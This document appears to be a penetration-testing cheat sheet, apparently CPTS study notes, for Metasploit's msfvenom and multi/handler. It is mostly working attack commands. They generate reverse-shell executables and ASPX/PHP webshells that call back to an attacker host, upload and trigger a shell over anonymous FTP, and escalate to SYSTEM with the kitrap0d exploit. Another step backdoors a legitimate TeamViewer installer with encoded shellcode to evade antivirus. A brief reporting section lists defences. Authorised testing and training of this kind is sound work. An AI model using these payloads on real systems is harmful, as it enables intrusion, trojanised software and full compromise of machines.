MSF Venom Workflow

🛡️ Methodology Checklist

• Select payload: msfvenom --list payloads | grep [OS]
• Generate Windows EXE: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f exe -o shell.exe
• Generate PHP webshell: msfvenom -p php/meterpreter_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f raw -o shell.php
• Start handler before delivering payload: use exploit/multi/handler
• Set handler payload to match venom payload exactly
• Deliver payload (upload, social engineering, exploit)
• Confirm callback and stabilise session

---

🎯 Operational Context

Use when: Full workflow for generating, delivering, and catching MSF payloads — from msfvenom generation through handler setup to active session. Think Dumber First: Generate payload → confirm architecture match → start listener BEFORE delivering payload → deliver → catch session. Order matters: if listener isn’t up when payload runs, connection is missed and you may not get another chance. Skip when: Using MSF exploit module directly — venom workflow is for standalone payload delivery.

---

⚡ Tactical Cheatsheet

Command	Tactical Outcome
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TARGET_IP] LPORT=1337 -f aspx > shell.aspx	Generate ASPX Meterpreter payload for IIS
use multi/handler	Load generic catch-all listener
set payload windows/meterpreter/reverse_tcp	MUST match the msfvenom payload exactly
set LHOST [TARGET_IP]; set LPORT 1337; run	Start handler to catch ASPX shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TARGET_IP] LPORT=[PORT] -k -x [LEGIT_APP].exe -f exe -o backdoored.exe	Inject payload into legitimate executable
use post/multi/recon/local_exploit_suggester	Find kernel exploits for current session
set SESSION [ID]; run	Run suggester against backgrounded session
use exploit/windows/local/ms10_015_kitrap0d	Kitrap0d local privilege escalation
set SESSION [ID]; set LPORT [PORT]; run	Run local exploit (new port for second shell)

---

🔬 Deep Dive & Workflow

Scenario: FTP → Web Shell → SYSTEM

A common CPTS scenario: anonymous FTP write access to the IIS web root.

# 1. Generate ASPX reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
 
# 2. Upload via FTP
ftp [TARGET_IP]
> binary
> put reverse_shell.aspx
 
# 3. Set up listener (payload must match exactly)
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 1337
run
 
# 4. Trigger via browser
# http://[TARGET_IP]/reverse_shell.aspx
# Browser hangs → handler catches Meterpreter session
 
# 5. Land as IIS APPPOOL\Web (low priv) → escalate
meterpreter > bg
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Output: Identified ms10_015_kitrap0d
 
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
set LPORT 1338   ← CRITICAL: new port, not 1337
run
# → NT AUTHORITY\SYSTEM

multi/handler — The Universal Catcher

Use multi/handler to catch connections from any standalone payload (not just MSF-generated exploits):

use multi/handler
set payload [EXACT_PAYLOAD_USED_IN_MSFVENOM]
set LHOST tun0
set LPORT [PORT]
run

The payload type in the handler must exactly match the msfvenom payload — staged vs stageless matters.

Executable Template Injection (-x and -k flags)

Embed shellcode into a legitimate, trusted executable to avoid AV flagging an unknown binary:

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
  -k \                      # run payload in separate thread (app stays functional)
  -x ~/Downloads/TeamViewer_Setup.exe \  # legitimate app as template
  -e x86/shikata_ga_nai -a x86 --platform windows \
  -o ~/Desktop/TeamViewer_Setup.exe -i 5

User runs TeamViewer_Setup.exe → TeamViewer installs normally → payload executes in background thread.

Port Conflicts — Using New Ports for Second Shell

When running a local exploit for privesc, the original handler is already using a port. Always set a different LPORT for the privilege escalation shell:

set SESSION 1
set LHOST tun0
set LPORT 1338   # NOT the same as the original 1337 shell
run

Format Reference (Quick)

Target	Flag	Extension
IIS (Windows)	-f aspx	.aspx
Tomcat (Java)	-f war	.war
Apache (Linux)	-f php	.php
Windows	-f exe	.exe

---

🛠️ Troubleshooting & Edge Cases

Problem	Cause	Fix
Payload generated but no session	Handler not running before delivery	Always start handler first: use multi/handler → set options → exploit -j
msfvenom exits with error	Missing payload or bad option	Verify payload name: msfvenom --list payloads | grep [KEYWORD]
EXE runs on target but crashes	Platform mismatch	Check: Windows 32-bit target needs x86 payload even on 64-bit OS for some attack vectors
Handler catches connection but stalls	Network jitter	Set set ListenerTimeout 300; use HTTPS payload for more stable connections
Generated payload too large for buffer overflow	Staged payload needed	Use staged (meterpreter/reverse_tcp) for smaller initial stub size

---

📝 Reporting Trigger

Finding Title: End-to-End Payload Delivery Achieves Interactive Shell Impact: Successful msfvenom payload generation and delivery establishes interactive Meterpreter session providing complete post-exploitation capability from a single exploit execution. Root Cause: Target application vulnerable to code execution with outbound network access unrestricted. No payload delivery controls in place. Recommendation: Patch exploited vulnerability. Implement egress filtering. Deploy behavioral EDR. Establish process allowlisting to prevent unauthorized executable delivery.

---

🔗 Related Nodes

• Payloads_MSFvenom
• Payloads_MSF_Framework
• MSF_Sessions_Jobs
• MSF_Meterpreter
• MSF_Encoders